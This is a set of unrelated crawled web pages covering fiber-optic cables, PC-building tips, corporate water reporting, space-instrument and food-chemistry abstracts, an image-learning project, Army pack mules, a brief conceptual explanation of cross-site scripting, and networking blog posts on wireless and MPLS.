Web iconoclasm, ignorance and religious intolerance doesn't just take place in the UK or in the US, though. In fact, there are no borders for such activities. Remember, iconoclasm led to the defacement of many religious artworks. Indeed, recently, #Op Vaticano led to the defacement of numerous Church websites… Today, the web is a scary combination of the old and the new. It constantly brings us new advancements and new marvels, but it also gives states the power to define what is a right religion and what is a wrong one. The true advancement would be to get past these constraints on freedom of speech and religion. | <urn:uuid:da184989-ced1-4db6-b6d5-51806a400719> | CC-MAIN-2017-04 | http://www.computerworld.com/article/2474932/internet/religious-beliefs-on-the-internet--between-ignorance-and-censorship.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280746.40/warc/CC-MAIN-20170116095120-00037-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.962515 | 1,088 | 2.828125 | 3 |
Duplex Fiber Cable
Duplex fiber cable is designed for general fiber patch cord production, where consistency and uniformity are vital for fast, efficient terminations. We have the right duplex fiber cable in many different outside diameter (OD) sizes to meet all tooling and termination requirements. Duplex fiber optic cables consist of two fibers joined by a thin connection between the two jackets. Workstations, fiber switches and servers, fiber optic modems, and similar hardware require duplex cable. They are used in applications where data needs to be transferred bi-directionally: one fiber transmits data in one direction, while the other fiber transmits data in the opposite direction. Duplex fiber optic cables from FiberStore are available in single-mode and multimode versions.
Multimode vs Singlemode Fiber
A “mode” in fiber optic cable refers to the path in which light travels. Multimode cables have a larger core diameter than singlemode cables. This larger core diameter allows multiple pathways and several wavelengths of light to be transmitted. Singlemode duplex cables and singlemode simplex cables have a smaller core diameter and allow only a single wavelength and pathway for light to travel. Multimode fiber is commonly used in patch cable applications such as fiber to the desktop or patch panel to equipment, and is available in two sizes, 50 micron and 62.5 micron. Singlemode fiber is typically used in network connections over long distances and is available in a core diameter of 9 microns (8.3 microns to be exact). Many types of multimode fiber optic cable (such as OM3 multimode fiber) and singlemode fiber optic cable are for sale at FiberStore.
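The core sizes above map onto standard fiber-optics theory. As an illustrative sketch (the numerical apertures below are typical textbook values, not figures from this page), the normalized frequency, or V-number, predicts whether a step-index fiber is single-mode (V below about 2.405) and roughly how many modes it carries:

```python
import math

def v_number(core_radius_m, wavelength_m, numerical_aperture):
    """Normalized frequency of a step-index optical fiber."""
    return (2 * math.pi * core_radius_m / wavelength_m) * numerical_aperture

# 50 um multimode core at 850 nm, NA ~0.20 (typical values, assumed here).
v_mm = v_number(25e-6, 850e-9, 0.20)
modes_mm = v_mm ** 2 / 2  # approximate mode count for an idealized step-index fiber

# ~8.2 um single-mode core at 1310 nm, NA ~0.12 (typical values, assumed here).
v_sm = v_number(4.1e-6, 1310e-9, 0.12)

print(f"multimode: V = {v_mm:.1f}, ~{modes_mm:.0f} modes")
print(f"singlemode: V = {v_sm:.2f} (< 2.405, so single-mode)")
```

Note that common 50 micron multimode fiber is actually graded-index rather than step-index, so the mode-count line is a rough upper-bound estimate; the single-mode threshold of V < 2.405 is the standard step-index result.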
How Fiber Optic Cables Work
The traditional method of data transmission over copper cables is accomplished by transmitting electrons over a copper conductor. Fiber Optic cables transmit a digital signal via pulses of light through a very thin strand of glass. Fiber strands (the core of the fiber optic cable) are extremely thin, no thicker than a human hair. The core is surrounded by a cladding which reflects the light back into the core and eliminates light from escaping the cable.
A fiber optic chain works in the following manner. At the one end, the fiber cable is connected to a transmitter. The transmitter converts electronic pulses into light pulses and sends the optical signal through the fiber cable. At the other end, the fiber cable is plugged into a receiver which decodes the optical signal back into digital pulses.
Advantages & Disadvantages of Fiber Optic Cable
There are many advantages and disadvantages to using fiber optic cable instead of copper cable. One advantage is that fiber cables support longer cable runs than copper. In addition, data is transmitted at greater speeds and higher bandwidths than over copper cables.
The major disadvantages of fiber optic cables are cost and durability. Fiber cables are more expensive than copper cables and much more delicate.
Three Steps To Pick Out A Fiber Optic Cable
So when you go to pick out a fiber optic cable, there are a few things you'll want to know. First, make sure that the type of connector you purchase matches your input connection. Second, check to see whether your device requires single-mode or multimode transfer. Third, figure out whether you need simplex or duplex fiber optic cable. And finally, choose the length you need; you can determine this by setting up your system and running a string from the speaker or TV to the equipment. Always buy the next larger length rather than one that is on the small side. You won't regret it!
Finally, you've got all your components and you're ready to start building your PC. Before you dive straight in without reading the manuals for your products, let me just take a moment to laugh at you for being silly enough not to read the manuals. While I'm composing myself, here are key safety tips that everyone should know before trying to build a computer.
THE SCOOP: Building your first desktop PC
BUILDING A PC: My components
1.) Read the manual. Seriously. Particularly if you're new to building PCs, this is vital information that can prevent you from plugging something into the wrong place and screwing up the whole build. Your motherboard manual is particularly critical.
2.) Static electricity is bad. Very, very bad. A static spark can damage the fantastically complicated and very exposed circuitry on many of your key components, turning them into expensive, oddly shaped paperweights.
While you can use an anti-static wristband to ground yourself and minimize the risk of shocking anything, it's not required, as long as you are conscientious about grounding yourself by touching something metal regularly while you build. It's hugely important to ensure that your workspace is static-free as well -- don't do this on your thickly carpeted floor, it'll end in tears.
Realistically, you're not likely to wreck anything too terribly with a single tiny spark, but safe is definitely better than sorry.
3.) Don't touch the exposed circuitry. While, like static electricity risk, this danger is often oversold to newbies by experienced builders, it's still a bad habit. Just try to handle things like your motherboard and graphics card by the edges and you should be fine.
4.) Make sure you install the motherboard standoffs in the case! These are little spacers that prevent the board from touching the side of the case. Failing to do this can result in short circuits occurring where soldered parts on the bottom of the board touch the case. (Note: Your case may have some other mechanism to elevate the motherboard. Make sure you read the manual.)
5.) And oh yeah -- READ THE MANUAL.
A word on workspaces: Try for an elevated, static-free space, like a big, clean countertop or table. Emphasis on clean, as you definitely don't want any foreign materials to get into the case. The elevated part is for your own benefit. I built my computer on a hardwood floor, and my knees and back felt like I'd been behind the plate for both games of a doubleheader for days afterwards. Ouch.
I'm not going to give a complete building guide, however. While my machine -- spoiler alert -- turned out just fine with me muddling my way through the process, I don't want to inadvertently give bad or misleading instructions. For comprehensive advice, I'd try one of the following sites:
1.) PCPartPicker.com -- This site allows you to choose components, organize them into a discrete configuration, and even pulls prices from major retailers to allow you get a sense of what you'll likely spend on a given build. What's more, it performs some compatibility checking, alerting you if your chosen CPU doesn't fit into the motherboard, for example. I found it invaluable in tinkering with possible setups.
However, first-timers are still well-advised to have an experienced human look over a build before pulling the trigger. Fortunately, PCPartPicker has a Reddit markup option, allowing for an easy copy and paste to ...
2.) r/BuildAPC -- This community of enthusiastic, dedicated hobbyists will be more than willing to critique your proposed setup before you build it, give advice on alternative parts, and even help you figure out why your shiny new computer isn't turning on. Just make sure you read the right sidebar carefully for posting guidelines and give as much relevant information as possible. Also, be prepared for them to demand pictures of your finished build once it's up and running!
3.) Tom's Hardware -- This is, if anything, an even more comprehensive resource than r/BuildAPC, with active forums, articles, and a wide range of reviews and guides to help out new and experienced builders alike. Its basic guide is frequently recommended as a starting point for those in need of full instructions on a first-time build.
Email Jon Gold at email@example.com and follow him on Twitter at @NWWJonGold.
Read more about data center in Network World's Data Center section.
This story, "Building a PC: safety tips and handy online resources" was originally published by Network World. | <urn:uuid:d1f53566-b61c-49ad-afb2-3c8742e29b2c> | CC-MAIN-2017-04 | http://www.itworld.com/article/2720283/hardware/building-a-pc--safety-tips-and-handy-online-resources.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280891.90/warc/CC-MAIN-20170116095120-00523-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.95078 | 956 | 2.6875 | 3 |
Water Use & Management
Although EMC has a relatively modest water footprint throughout our operations, we take a conscientious approach to conserving this important global resource today and for future generations. We are guided by our focus on minimizing water consumption and managing wastewater in our owned and operated facilities to help protect local water quality. Our owned global manufacturing facilities produce no industrial wastewater. Our greatest potential water impact, however, is directly tied to energy efficiency. By creating more efficient products, we reduce the need for water to cool them and decrease the quantities of water demanded for generating electricity. To learn more, visit Products Stewardship and Efficiency.
Water Risk Assessment
EMC has conducted water risk assessments to evaluate the physical, regulatory and other risks related to water occurring now, or possibly impacting our business in the future.
Water is integrated into a comprehensive corporate risk assessment process incorporating both direct operations and supply chain. A sustainability overlay has been created detailing how water and other sustainability issues impact the likelihood and magnitude of strategic, financial, operational, and reputational risk. Risk registers are created to itemize specific risks for roll-up into the corporate view. To learn more about EMC’s corporate risk assessment process, visit Risk Management.
As part of our assessment, we used the World Business Council on Sustainable Development (WBCSD) Water Tool and the WRI Aqueduct Water Risk Atlas Tool to identify physical, regulatory, and reputational water risks at both the country and river basin level. To learn more, visit EMC 2015 CDP Water Disclosure Response.
Water is also an element of the risk assessment we conduct for our supply chain, which combines an internally-developed risk assessment with Electronic Industry Citizenship Coalition (EICC) tools. We work directly with our suppliers to evaluate risk factors and associated controls. To learn more, visit Supply Chain.
Water Conservation Efforts
EMC’s approach includes the use of various water efficiency and conservation features in our facilities worldwide, such as low-flow plumbing fixtures, rainwater capture systems, and free air cooling. We also consider water conservation and efficiency elements when designing and constructing new facilities. In 2015, our Global Energy & Water Management Steering Committee helped to focus regional efforts on water consumption and to expand water conservation programs across the globe. To learn more about the committee, visit Efficient Facilities.
At our headquarters in Hopkinton, Massachusetts and our Bangalore, India Center of Excellence (COE), wastewater is reclaimed at the onsite treatment plants, which filter wastewater through treatment and disinfection processes, resulting in treated “gray” water. In 2015, we reused more than 22,550 cubic meters of gray water for cooling, sanitation, and irrigation at the Hopkinton facility, and 41,644 cubic meters at the Bangalore COE facility. Unused gray water is returned to the ground through infiltration systems to replenish local watersheds.
[Table: EMC Corporate Water Reuse, Massachusetts Facilities (cubic meters)]
At EMC’s Massachusetts campus facilities, we have implemented a stringent Stormwater Management System to help protect and maintain the integrity of the surrounding resources. At these facilities, we have also implemented an Integrated Pest Management program to minimize and eliminate the use of chemical herbicides, insecticides, and pesticides where possible. Through diligent management efforts, we ensure a high quality of storm water runoff from our facilities. This minimizes the impact of our operations on natural resources, including groundwater and surface water, and helps ensure that these resources are protected in the future.
EMC’s owned manufacturing process is not water intensive, and produces no industrial wastewater. In EMC’s operations, water is consumed through normal building systems use such as for cooling, drinking and other sanitary purposes. Since 2007, we have tracked water consumption data for all of our owned facilities and most of the larger facilities that we lease.
Our estimated total 2015 global water withdrawal was 1,180,736 cubic meters. Seventy-two percent of the water withdrawal data was compiled from reliable water bills and water meter readings. The remaining annual corporate water consumption was estimated using a water intensity factor calculated by benchmarking consumption at metered EMC facilities.
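The intensity-factor estimate described above can be sketched as follows. All figures in this snippet are made up for illustration and are not EMC's actual metered data:

```python
# Illustrative intensity-factor estimation: metered consumption comes from
# invoices; unmetered floor space is assigned the intensity (m^3 per sq ft)
# observed at metered sites. All numbers are hypothetical.
metered_m3 = 850_000        # summed from water bills / meter readings
metered_sqft = 6_000_000    # floor area covered by those meters
unmetered_sqft = 2_300_000  # remaining floor area in the portfolio

intensity = metered_m3 / metered_sqft             # water intensity factor
estimated_unmetered_m3 = intensity * unmetered_sqft
total_m3 = metered_m3 + estimated_unmetered_m3

print(f"intensity: {intensity:.4f} m^3/sqft")
print(f"estimated total withdrawal: {total_m3:,.0f} m^3")
```

The accuracy of such an estimate depends on how representative the metered sites are of the unmetered ones, which is why the share of invoice-backed data (72 percent in 2015) is worth reporting alongside the total.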
[Table: Global Water Withdrawal, All Leased and Owned Global Facilities, including VMware (cubic meters, M³)]
*Re-stated water consumption in previous years based on changes in square footage and availability of additional water invoices. Invoice availability in 2014 was actually 70%, rather than 75%, due to changes in portfolio square footage.
Energy – Water Nexus
We recognize that water, energy, and carbon emissions are interconnected. Water is required to generate and transmit the energy EMC consumes, and energy is used to supply the water we use. Our suppliers also use water in their operations to produce the material components in our products. Thoughtful water conservation and efficiency practices help save energy and reduce the carbon emissions generated from these activities.
We also understand that there can be trade-offs between water and carbon emissions. Water and energy are needed to power and cool our own offices and data centers, as well as those of our customers, and our wastewater treatment plant consumes energy, while reducing our water footprint.
We take a systematic view of energy and water use and the resulting carbon emissions, and focus on driving efficiencies in our products and operations. For example, applying free air cooling technology has allowed us to reduce the amount of energy and water consumed in our data centers and labs. | <urn:uuid:acc2ef00-59c7-4407-942c-b9103cc49a4b> | CC-MAIN-2017-04 | https://www.emc.com/corporate/sustainability/operations/water.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279923.28/warc/CC-MAIN-20170116095119-00065-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.927426 | 1,124 | 2.546875 | 3 |
Valtonen E. and Eronen T. (University of Turku); Nenonen S. and Andersson H. (Oxford Instruments); and 9 more authors. Nuclear Instruments and Methods in Physics Research, Section A: Accelerators, Spectrometers, Detectors and Associated Equipment (2016).

We have fabricated and tested a thin silicon detector with the specific goal of having a very good thickness uniformity. SOI technology was used in the detector fabrication. The detector was designed to be used as a ΔE detector in a silicon telescope for measuring solar energetic particles in space. The detector thickness was specified to be 20 μm with an rms thickness uniformity of ±0.5%. The active area consists of three separate elements, a round centre area and two surrounding annular segments. A new method was developed for measuring the thickness uniformity based on a modified Fizeau interferometer. The thickness uniformity specification was well met, with a measured rms thickness variation of 43 nm. The detector was electrically characterized by measuring the I-V and C-V curves, and the performance was verified using a ²⁴¹Am alpha source. © 2015 Elsevier B.V. All rights reserved.
Cyamukungu M.,Catholic University of Louvain |
Benck S.,Catholic University of Louvain |
Borisov S.,Catholic University of Louvain |
Gregoire G.,Catholic University of Louvain |
And 32 more authors.
IEEE Transactions on Nuclear Science | Year: 2014
This paper provides a detailed description of the Energetic Particle Telescope (EPT) accommodated on board the PROBA-V satellite launched on May 7th, 2013 into LEO at 820 km altitude, 98.7° inclination, and a 10:30-11:30 Local Time at Descending Node. The EPT is an ionizing particle spectrometer that was designed based on a new concept and the most advanced signal processing technologies: it performs in-flight electron and ion discrimination and classifies each detected particle in its corresponding physical channels, from which the incident spectrum can be readily reconstructed. The detector measures electron fluxes in the energy range 0.5-20 MeV, proton fluxes in the energy range 9.5-300 MeV and He-ion fluxes between 38 and 1200 MeV. The EPT is a modular configurable instrument with customizable maximum energy, field of view angle, geometrical factor and angular resolution. Therefore, the features of the currently flying instrument may slightly differ from those described in past or future configurations. After a description of the instrument along with the data acquisition and analysis procedures, the first particle fluxes measured by the EPT will be shown and discussed. The web-site located at http://web.csr.ucl.ac.be/csr-web/probav/, which daily displays measured fluxes and other related studies, will also be briefly described. © 1963-2012 IEEE.
Kudin A.M.,Ukrainian Academy of Sciences |
Borodenko Y.A.,Ukrainian Academy of Sciences |
Grinyov B.V.,Ukrainian Academy of Sciences |
Didenko A.V.,Ukrainian Academy of Sciences |
And 9 more authors.
Instruments and Experimental Techniques | Year: 2010
CsI(Tl) crystal + Si photodiode scintillation assemblies have been designed to detect photons with energies of 60-1330 keV and protons with energies of 6-50 MeV. The spectrometric characteristics of the assemblies and their radiation hardness have been investigated. The assemblies are shown to have a high energy resolution: 19.6 and 4.6-5.0% for photons with energies of 59.6 and 662 keV and 3.9 and 1.5% for protons with energies of 10 and 20 MeV, respectively. The radiation hardness of these detectors is rather high: it corresponds to a dose of up to 10³ Gy under photon irradiation and fluxes of up to 10¹² protons/cm² under exposure to protons. © 2010 Pleiades Publishing, Ltd.
Virtanen J.,Finnish Geospatial Research Institute |
Poikonen J.,Kovilta Oy |
Santti T.,Aboa Space Research Oy |
Komulainen T.,Aboa Space Research Oy |
And 10 more authors.
Advances in Space Research | Year: 2015
We describe a novel data-processing and analysis pipeline for optical observations of moving objects, either of natural (asteroids, meteors) or artificial origin (satellites, space debris). The monitoring of the space object populations requires reliable acquisition of observational data, to support the development and validation of population models and to build and maintain catalogues of orbital elements. The orbital catalogues are, in turn, needed for the assessment of close approaches (for asteroids, with the Earth; for satellites, with each other) and for the support of contingency situations or launches. For both types of populations, there is also increasing interest to detect fainter objects corresponding to the small end of the size distribution. The ESA-funded StreakDet (streak detection and astrometric reduction) activity has aimed at formulating and discussing suitable approaches for the detection and astrometric reduction of object trails, or streaks, in optical observations. Our two main focuses are objects in lower altitudes and space-based observations (i.e., high angular velocities), resulting in long (potentially curved) and faint streaks in the optical images. In particular, we concentrate on single-image (as compared to consecutive frames of the same field) and low-SNR detection of objects. Particular attention has been paid to the process of extraction of all necessary information from one image (segmentation), and subsequently, to efficient reduction of the extracted data (classification). We have developed an automated streak detection and processing pipeline and demonstrated its performance with an extensive database of semisynthetic images simulating streak observations both from ground-based and space-based observing platforms. The average processing time per image is about 13 s for a typical 2k-by-2k image. For long streaks (length > 100 pixels), primary targets of the pipeline, the detection sensitivity (true positives) is about 90% for both scenarios for bright streaks (SNR > 1), while in the low-SNR regime, the sensitivity is still 50% at SNR = 0.5. © 2015 COSPAR.
Huovelin J.,University of Helsinki |
Vainio R.,University of Helsinki |
Andersson H.,Oxford Instruments |
Valtonen E.,Aboa Space Research Oy |
And 19 more authors.
Planetary and Space Science | Year: 2010
The Solar Intensity X-ray and particle Spectrometer (SIXS) on the BepiColombo Mercury Planetary Orbiter (MPO) will investigate the direct solar X-rays, and energetic protons and electrons which pass the Spacecraft on their way to the surface of Mercury. These measurements are vitally important for understanding quantitatively the processes that make Mercury's surface glow in X-rays, since all X-rays from Mercury are due to interactions of the surface with incoming highly energetic photons and space particles. The X-ray emission of Mercury's surface will be analysed to understand its structure and composition. SIXS data will also be utilised for studies of the solar X-ray corona, flares, solar energetic particles, and the magnetosphere of Mercury, and for providing information on solar eruptions to other BepiColombo instruments. SIXS consists of two detector subsystems. The X-ray detector system includes three identical GaAs PIN detectors which measure the solar spectrum at 1-20 keV energy range, and their combined field-of-view covers ∼1/4 of the whole sky. The particle detector system consists of an assembly including a cubic central CsI(Tl) scintillator detector with five of its six surfaces covered by a thin Si detector, which together perform low-resolution particle spectroscopy with a rough angular resolution over a field-of-view covering ∼1/4 of the whole sky. The energy range of detected particle spectra is 0.1-3 MeV for electrons and 1-30 MeV for protons. A major task for the SIXS instrument is the measurement of solar X-rays on the dayside of Mercury's surface to enable modeling of X-ray fluorescence and scattering on the planet's surface. Since highly energetic particles are expected to also induce a significant amount of X-ray emission via particle-induced X-ray emission (PIXE) and bremsstrahlung when they are absorbed by the solid surface of the planet Mercury, SIXS performs measurements of fluxes and spectra of protons and electrons. 
SIXS performs particle measurement at all orbital phases of the MPO, as particle radiation can also occur on the night side of Mercury. The energy ranges, resolutions, and timings of X-ray and particle measurements by SIXS have been adjusted to match the requirements for interpretation of data from Mercury's surface, to be performed by utilising the data of the Mercury Imaging X-ray Spectrometer (MIXS), which will measure X-ray emission from the surface. © 2008 Elsevier Ltd. All rights reserved.
Carnegie Mellon University has been running a computer cluster since July that scans the web for images in order to make sense out of them. The project, dubbed Never Ending Image Learner, could pave the way for computers that better understand the visual world in ways that humans often take for granted.
You can check out NEIL in action here, as I did to see what sense it had made of Batman pictures (it learned that the Joker can kind of look like Batman).
The project, funded by Google and the Office of Naval Research, runs on 2 clusters of computers comprising 200 cores that are building what researchers hope will be the world's largest visual knowledge base. They're building a database that makes connections between images to better understand them (such as that cars are typically found on roads and that pink doesn't necessarily refer to the singer of that name). NEIL has plowed through some 3 million images and has identified thousands of objects and scenes, and as a result, relationships.
The cluster isn't doing all the work on its own. As researcher Abhinav Shrivastava says, humans might not always know what to teach computers, but they "are good at telling computers when they are wrong."
It's not surprising that Google is putting funds behind this project given that image search is a focus for the company, which recently added search by image to its Chrome web browser. | <urn:uuid:7182ab55-1988-4107-bd14-b2dc6a38a3bb> | CC-MAIN-2017-04 | http://www.networkworld.com/article/2225872/data-center/oh-no--now-even-computers-have-more-common-sense-than-me.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285337.76/warc/CC-MAIN-20170116095125-00358-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.979043 | 279 | 2.96875 | 3 |
Kometani T.,Ezaki Glico Co.
Pure and Applied Chemistry | Year: 2010
Recently, people have been paying greater attention to their health and, as a result, a market need for physiologically functional foods has emerged. For these reasons, the market size of "foods for specified health use" (FOSHU) in Japan has grown and was approximately ¥700 billion in 2008. Many enzymes such as amylases and proteases have been used in food manufacturing because of their diversity, specificity, and mild reaction conditions. The aim of this investigation was the production of novel bioactive compounds by three kinds of transglycosylation reactions of the amylolytic enzymes, and the research and development of physiologically functional foods using these compounds. Phosphoryl oligosaccharides of calcium (POs-Ca) are a complex with Ca and phosphoryl oligosaccharides prepared from potato starch by a hydrolysis (transglycosylation to H2O) of amylolytic enzymes. Chewing gum that included POs-Ca prevented dental caries in humans. Highly branched cyclic dextrin (HBCD) was produced from amylopectin by branching enzyme (intramolecular transglycosylation), which had a relatively narrow molecular-weight distribution compared with commercially available dextrins. The sports drink containing HBCD enhanced swimming endurance in mice and humans. α-Glycosylhesperidin (G-Hsp) was produced from starch and hesperidin, a flavonoid found abundantly in citrus fruits, by intermolecular transglycosylation using cyclodextrin glucanotransferase. Oral administration of G-Hsp improved rheumatoid arthritis in mice and humans, and poor blood circulation in women. In this study, we looked to prove that this enzymatic modification technique was useful in creating unique and effective physiologically functional foods. These functional foods are expected to improve the health and quality of life of many people. © 2010 IUPAC.
Sanwa Cornstarch Co. and Ezaki Glico Co. | Date: 2012-12-13
A disintegrant for tablets includes an α-1,4-glucan having a degree of polymerization of not less than 180 and less than 1230 and a dispersity (weight average molecular weight Mw/number average molecular weight Mn) of not more than 1.25 or a modified product thereof. A binder for tablets includes an α-1,4-glucan having a degree of polymerization of not less than 1230 and not more than 37000 and a dispersity of not more than 1.25, or a modified product thereof. A binding-disintegrating agent for tablets includes a low molecular weight α-1,4-glucan or a modified product thereof, and a high molecular weight α-1,4-glucan or a modified product thereof.
Omikenshi Co., Kanto Natural Gas Development Co. and Ezaki Glico Co. | Date: 2010-06-17
A method for producing an amylose-containing rayon fiber, comprising the steps of: mixing an aqueous alkaline solution of amylose with viscose to obtain a mixed liquid, spinning the mixed liquid to obtain an amylose-containing rayon fiber, and bringing the amylose-containing rayon fiber into contact with iodine or polyiodide ions, thereby allowing an amylose in the amylose-containing rayon fiber to make a clathrate including the iodine or polyiodide ions, wherein the amylose is an enzymatically synthesized amylose having a weight average molecular weight of 310
Ezaki Glico Co. and Glico Nutrition Co. | Date: 2012-12-25
Provided is a preparation method for phycocyanin, including: adding chitosan to a suspension of cyanobacteria containing phycocyanin; and filtering the suspension.
Ezaki Glico Co. | Date: 2013-09-25
Provided is an external preparation for skin, comprising a phosphorylated saccharide. The phosphorylated saccharide may be an inorganic salt of a phosphorylated saccharide. The phosphorylated saccharide may be a calcium, magnesium, potassium, zinc, iron or sodium salt. Also provided is an external preparation for skin, comprising a phosphorylated saccharide and a second component, wherein the second component is selected from the group consisting of moisturizing agents, whitening components, ultraviolet absorbents, anti-inflammatory agents, cell-activating agents and antioxidants. The moisturizing agent may be ascorbic acid or an ascorbic acid derivative. | <urn:uuid:742b76de-1246-4ad4-8c91-01eb507d7d65> | CC-MAIN-2017-04 | https://www.linknovate.com/affiliation/ezaki-glico-co-37120/all/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279248.16/warc/CC-MAIN-20170116095119-00268-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.912768 | 1,012 | 2.578125 | 3 |
Army could ditch robots for mules
- By Michael Hardy
- May 27, 2011
There are times when technology meets a limit and an old way of doing things turns out to still be the best. The Army is beginning to think that an effort to use robots for hauling supplies across mountainous terrain might become one of those times, at least for now. The robots aren't doing well in testing, and the Army is considering bringing back an older technology: the pack mule.
The Army is even considering reviving a 19th-century component, the Animal Corps, to care for the animals, said Jim Overholt, senior research scientist for robotics at the Army Tank Automotive Research, Development and Engineering Center, in a report in the blog National Defense.
According to that post, by Stew Magnuson, high-level Army and Defense Department officials are considering the revival of the Animal Corps based on comments Overholt made while speaking at a robotics conference sponsored by the National Defense Industrial Association — publisher of National Defense — and the Association for Unmanned Vehicle Systems International.
"Overholt suggested that the talk of bringing mules back to the battlefield is derived from the frustration Army leaders feel that the leader-follower robotics technology is not ready to be fielded while there is an acute need to lighten troops' loads," Magnuson writes.
There have been several research efforts to develop robots to carry supplies and accompany soldiers in the field, most notably one called BigDog funded by the Defense Advanced Research Projects Agency, Magnuson adds. Thus far, none of them have succeeded.
Now the return to animals is a real possibility, writes David Axe at Wired's "Danger Room" blog.
"If everything works out, the future Army could look a lot like the Army of the 19th century, with trains of braying, kicking mules trailing behind the foot soldiers as they stomp through fields, slog through streams and wheeze up steep hillsides," Axe writes. "As in the Army of the 1800s, teams of specially trained veterinarians and animal-handlers would ensure the combat mules stayed battle-ready."
Technology journalist Michael Hardy is a former FCW editor. | <urn:uuid:47574be6-5f05-48ba-980a-0ebfff0e2d77> | CC-MAIN-2017-04 | https://fcw.com/articles/2011/05/27/army-ditch-robots-pack-mules.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280485.79/warc/CC-MAIN-20170116095120-00084-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.954862 | 451 | 2.6875 | 3 |
Cross site scripting (also known as XSS) occurs when a web application gathers malicious data from a user. The data is usually gathered in the form of a hyperlink which contains malicious content within it. The user will most likely click on this link from another website, web board, email, or from an instant message. Usually the attacker will encode the malicious portion of the link to the site in HEX (or other encoding methods) so the request is less suspicious looking to the user when clicked on. After the data is collected by the web application, it creates an output page for the user containing the malicious data that was originally sent to it, but in a manner to make it appear as valid content from the website.
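The flow described above — encode a payload to disguise it, let a vulnerable application reflect it back as live markup — can be sketched in a few lines of Python. The site names and the payload here are hypothetical, and the escaping shown at the end is the standard mitigation, not part of the original FAQ text:

```python
import html
import urllib.parse

# Hypothetical reflected-XSS payload an attacker might embed in a link.
payload = '<script>document.location="http://evil.example/?c=" + document.cookie</script>'

# URL/hex-encoding the payload makes the link look less suspicious when clicked.
link = "http://victim.example/search?q=" + urllib.parse.quote(payload)

# A vulnerable application decodes the parameter and reflects it back verbatim.
query = urllib.parse.unquote(urllib.parse.urlsplit(link).query.split("=", 1)[1])
unsafe_page = "<p>Results for: %s</p>" % query             # contains a live <script> tag

# Escaping the output before rendering neutralizes the payload.
safe_page = "<p>Results for: %s</p>" % html.escape(query)  # only inert &lt;script&gt; text

print(unsafe_page)
print(safe_page)
```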
Download the paper in TXT format here. | <urn:uuid:0263effe-f594-4fd9-9265-5a41de25ca25> | CC-MAIN-2017-04 | https://www.helpnetsecurity.com/2002/11/06/the-cross-site-scripting-faq/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283475.86/warc/CC-MAIN-20170116095123-00294-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.93427 | 156 | 3.578125 | 4 |
Archive for August, 2010
For success designing and implementing Cisco Wireless solutions, a CCNA Wireless student needs to be familiar with the options for various wireless topologies. Two were defined by the 802.11 committees, while others were made possible thanks to excellent developments by wireless vendors like Cisco Systems.
The 802.11 Topologies
Ad Hoc Mode
While not popular, it is possible to have wireless devices communicate directly with no central device managing the communications. This is called the Ad Hoc network topology and is one of the two topologies defined by the 802.11 committees. In the Ad Hoc type topology, one device sets a group name and radio parameters, and another device uses this information to connect to the wireless network.
This type of wireless network topology is referred to as an Independent Basic Service Set (IBSS). This is easy to remember as we know the devices are working independently of an access point (AP).
Network Infrastructure Mode
When an access point is used to create the network, the official term is network infrastructure mode for the network. There is a Basic Service Set (BSS) setup that uses a single access point, or the Extended Service Set (ESS) that uses multiple access points in order to extend the reach of the wireless network.
One of the frequent questions I hear regarding L3VPNs, is regarding the bottom VPN label. In this article, we will focus on the control plane that provides both the VPN and transit labels, and then look at the data plane that results because of those labels.
In the topology, there are 2 customer sites (bottom right and bottom left). The BGP, VRFs, redistribution, etc. are all configured to allow us to focus on the control and data plane. Let's begin by verifying that R1 is sourcing the network, 184.108.40.206/32.
A debug verifies that R1 is sending the updates for 220.127.116.11 to R2.
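The resulting data plane — the part the original question is about — can be modeled as a toy sketch. The label values below are invented for illustration; in a real network the bottom VPN label comes from BGP and the top transit label from LDP or RSVP:

```python
# Toy model of an L3VPN label stack (label values are made up for illustration).
vpn_label_from_bgp = 21          # egress PE's label for the customer prefix (bottom)
transit_label_to_next_hop = 17   # LDP label toward the egress PE's loopback (top)

# Ingress PE pushes both labels, top of stack first.
packet = {"dest": "customer-prefix",
          "labels": [transit_label_to_next_hop, vpn_label_from_bgp]}

# A core P router only swaps the top (transit) label; it never sees the VPN
# label or an IP route for the customer prefix -- the "BGP free core".
lfib_on_p_router = {17: 25}      # in-label -> out-label
packet["labels"][0] = lfib_on_p_router[packet["labels"][0]]

# Penultimate-hop popping removes the transit label before the egress PE...
packet["labels"].pop(0)

# ...so the egress PE receives only the VPN label and uses it to pick the VRF.
vpn_label_to_vrf = {21: "VPN_A"}
vrf = vpn_label_to_vrf[packet["labels"][0]]
print(vrf)   # VPN_A
```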
In this blog post we’re going to discuss the fundamental logic of how MPLS tunnels allow applications such as L2VPN & L3VPN to work, and how MPLS tunnels enable Service Providers to run what is known as the “BGP Free Core”. In a nutshell, MPLS tunnels allow traffic to transit over devices that have no knowledge of the traffic’s final destination, similar to how GRE tunnels and site-to-site IPsec VPN tunnels work. To accomplish this, MPLS tunnels use a combination of IGP learned information, BGP learned information, and MPLS labels.
We wanted to provide our students with advance notification of some upcoming online classes here at INE. While we hope to see many students in the actual live events, on-demand versions will indeed be made available the week following the live, online version.
September 13 – 17th, 2010 CCNA Wireless 5-Day Bootcamp
September 15 – 17th, 2010 Security for CCIE R&S Candidates 3-Day Bootcamp
September 29 – Oct 1, 2010 IPv4/IPv6 Multicast 3-Day Bootcamp
October 4 – 9th, 2010 Online 6-Day CCIE R&S Bootcamp with K. Barker and A. Sequeira
Our BGP class is coming up! This class is for learners who are pursuing the CCIP track, or simply want to really master BGP. I have been working through the slides, examples and demos that we’ll use in class, and it is going to be excellent. If you can’t make the live event, we are recording it, so it will be available as a class on demand, after the live event. More information, can be found by clicking here.
One of the common questions that comes up is “Why does the router choose THAT route?”
